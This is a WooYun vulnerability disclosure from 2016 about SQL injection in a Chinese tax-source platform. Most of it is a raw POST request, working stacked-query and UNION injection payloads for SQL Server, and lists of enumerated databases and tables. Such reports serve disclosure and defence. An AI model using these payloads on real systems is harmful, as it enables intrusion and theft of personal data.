漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0168721
漏洞标题:某税源保障工作平台弱口令/sql注入
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2016-01-14 17:02
修复时间:2016-02-27 11:49
公开时间:2016-02-27 11:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开
简要描述:
某税源保障工作平台弱口令/sql注入
详细说明:
POST /ScManufact/ScPlan.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/ScManufact/ScPlan.aspx
Cookie: ASP.NET_SessionId=ctvqjf5hwbhubi3btg0m2t34; mytable_notify_2=170513f4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4609
__VIEWSTATE=%2FwEPDwUKLTU5MzY4NDIzNg9kFgJmD2QWBgIGDzwrABECAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIHZAEQFgAWABYAFgJmD2QWEAIBDw9kFgQeC29ubW91c2VvdmVyBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx4Kb25tb3VzZW91dAUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhFTY1ZpZXcuYXNweD9JRD0yMxjmtYvor5Xml6XmnJ%2FpgInmi6nlmajkuoxkAgEPDxYCHgRUZXh0BQblk4jlk4hkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTM6MjA6MzhkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTIzIj7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0yMyI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgIPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTIyDOmHh%2Bi0reiuouWNlWQCAQ8PFgIfBAUDRERTZGQCAg8PFgIfBAUSMjAxMy02LTIwIDEzOjE2OjQxZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EZWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0yMiI%2B6L%2Bb5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg%2FSUQ9MjIiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIDDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhFTY1ZpZXcuYXNweD9JRD0yMQRlZmVmZAIBDw8WAh8EBQZmZWblr7pkZAICDw8WAh8EBRIyMDEzLTYtMjQgMTM6NDk6MzRkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTIxIj7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0yMSI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgQPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTIwBGVlZWVkAgEPDxYCHwQFBGV3d3dkZAICDw8WAh8EBRIyMDEzLTYtMTYgMTY6Mzc6MTlkZAIDDw8WAh8EBQdOb0xvZ2luZGQCBA8PFgIfBGVkZAIFDw8WAh8EBVE8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC1sb25nLWJ0biIgaHJlZj0iU2NNYW51UHJvLmFzcHg%2FSUQ9MjAiPui%2Fm%2BW6puaYjue7hjwvYT5kZAIGDw8WAh8EBVU8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTIwIj7nlJ%2FkuqfmmI7nu4bljZU8L2E%2BZGQCBQ8PZBYEHwIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg%2FSUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E%2BZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI%2B55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI%2B6L%2Bb5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg%2FSUQ9MTIiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui%2Fm%2BW6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn%2BS6p%2BaYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi%2F2%2F%2Bzk1d9dAB5F97u7p3aJWwDAnIyTHV3Q%3D%3D&__EVENTVALIDATION=%2FwEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI%2FJ7Q0mwQDqQi7&TextBox1=123*&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=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Z3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg/SUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E+ZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI+55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI+6L+b5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg/SUQ9MTIiPueUn+S6p+aYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui/m+W6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn+S6p+aYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi/2/+zk1d9dAB5F97u7p3aJWwDAnIyTHV3Q==&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123';WAITFOR DELAY '0:0:5'--&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: __VIEWSTATE=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Z3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwMFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7Fg5mD2QWAmYPFQIRU2NWaWV3LmFzcHg/SUQ9MTYMYmJiYmJiYmJiYmJiZAIBDw8WAh8EBQnnjovlhavom4tkZAICDw8WAh8EBRIyMDEzLTYtMjAgMTQ6MjA6NTlkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVRPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTE2Ij7ov5vluqbmmI7nu4Y8L2E+ZGQCBg8PFgIfBAVVPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwteWVsbG93LWJ0biIgaHJlZj0iU2NEZXRhaWwuYXNweD9JRD0xNiI+55Sf5Lqn5piO57uG5Y2VPC9hPmRkAgYPD2QWBB8CBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8DBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYOZg9kFgJmDxUCEVNjVmlldy5hc3B4P0lEPTEyDWFkYWRkZGRkZGRkZGRkAgEPDxYCHwQFAnNkZGQCAg8PFgIfBAUSMjAxMy02LTE1IDE1OjA1OjI5ZGQCAw8PFgIfBAUFYWRtaW5kZAIEDw8WAh8EBQIzMWRkAgUPDxYCHwQFUTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLWxvbmctYnRuIiBocmVmPSJTY01hbnVQcm8uYXNweD9JRD0xMiI+6L+b5bqm5piO57uGPC9hPmRkAgYPDxYCHwQFVTxhIGNsYXNzPSJiYmsgYnV0dG9uIHNtYWxsLXllbGxvdy1idG4iIGhyZWY9IlNjRGV0YWlsLmFzcHg/SUQ9MTIiPueUn+S6p+aYjue7huWNlTwvYT5kZAIHDw9kFgQfAgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfAwUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWDmYPZBYCZg8VAhBTY1ZpZXcuYXNweD9JRD0xBkJULTAwMWQCAQ8PFgIfBAUCYnRkZAICDw8WAh8EBRIyMDEzLTYtMTUgMTQ6NDY6MjdkZAIDDw8WAh8EBQVhZG1pbmRkAgQPDxYCHwRlZGQCBQ8PFgIfBAVQPGEgY2xhc3M9ImJiayBidXR0b24gc21hbGwtbG9uZy1idG4iIGhyZWY9IlNjTWFudVByby5hc3B4P0lEPTEiPui/m+W6puaYjue7hjwvYT5kZAIGDw8WAh8EBVQ8YSBjbGFzcz0iYmJrIGJ1dHRvbiBzbWFsbC15ZWxsb3ctYnRuIiBocmVmPSJTY0RldGFpbC5hc3B4P0lEPTEiPueUn+S6p+aYjue7huWNlTwvYT5kZAIIDw8WAh4HVmlzaWJsZWhkZAIQDw8WAh8EBQExZGQCEg8PFgIfBAUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ88KwAMAQgCAWQCPM0Jjspi/2/+zk1d9dAB5F97u7p3aJWwDAnIyTHV3Q==&__EVENTVALIDATION=/wEWCwLqtNmfBQLs0bLrBgLSwv2aBALSwtXkAgLu/93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CWTR4gesdHVs9NX9UPwV8KiWmxerKKI/J7Q0mwQDqQi7&TextBox1=123' UNION ALL SELECT 75,75,75,75,75,75,75,75,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(79)+CHAR(105)+CHAR(75)+CHAR(103)+CHAR(66)+CHAR(73)+CHAR(80)+CHAR(66)+CHAR(110)+CHAR(109)+CHAR(99)+CHAR(69)+CHAR(74)+CHAR(89)+CHAR(81)+CHAR(107)+CHAR(111)+CHAR(97)+CHAR(72)+CHAR(107)+CHAR(87)+CHAR(120)+CHAR(84)+CHAR(115)+CHAR(90)+CHAR(112)+CHAR(99)+CHAR(67)+CHAR(111)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(118)+CHAR(85)+CHAR(87)+CHAR(117)+CHAR(67)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),75,75,75-- -&ImageButton4.x=22&ImageButton4.y=4&TxtPageSize=15&GoPage=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: master
[15 tables]
+-------------------------------------+
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.dm_os_hosts |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.openkeys |
+-------------------------------------+
Database: hexieshequ_develop_old
[15 tables]
+-------------------------------------+
| ERPNForm |
| ERPNFormType |
| ERPNWorkDetails |
| ERPNWorkFlow |
| ERPNWorkFlowNode |
| ERPNWorkFlowWT |
| ERPNWorkToDo |
| staff |
| system_log |
| t_Union_members |
| t_duty |
| t_jiu_renkou_ddj |
| t_jiu_renkou_xinxi_bak2 |
| t_jiu_renkou_xinxi_xilou |
| t_old_soldier |
+-------------------------------------+
Database: msdb
[9 tables]
+-------------------------------------+
